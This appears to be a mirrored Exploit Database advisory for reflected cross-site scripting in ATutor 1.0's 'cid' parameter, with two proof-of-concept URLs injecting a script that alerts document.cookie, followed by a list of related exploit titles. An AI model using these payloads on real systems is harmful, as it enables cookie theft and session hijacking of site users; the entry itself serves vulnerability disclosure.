ATutor 1.0 – Multiple ‘cid’ Cross-Site Scripting Vulnerabilities

Exploit Database
110 阅读

作者： High-Tech Bridge SA

日期： 2010-09-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34631/

source: https://www.securityfocus.com/bid/43241/info

ATutor is prone to multiple cross-site scripting vulnerabilities.

An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

ATutor 1.0 is vulnerable, other versions may also be affected.

http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>

http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script>

last Exploits
ATutor 1.0 – Multiple ‘cid’ Cross-Site Scripting Vulnerabilities的更多信息

Joomla! Component com_jnews 8.5.1 – SQL Injection：
Joomla! Component JComments 2.1 – ‘ComntrNam’ Cross-Site Scripting：
Small CRM 3.0 – ‘description’ Stored Cross-Site Scripting (XSS)：
ES CmS 0.1 – SQL Injection：
CSZ CMS 1.2.9 – ‘Multiple’ Arbitrary File Deletion：
ApPHP MicroBlog 1.0.2 – Persistent Cross-Site Scripting：
Prestashop 8.0.4 – Cross-Site Scripting (XSS)：
Ultrabenosaurus ChatBoard – Cross-Site Request Forgery (Send Message)：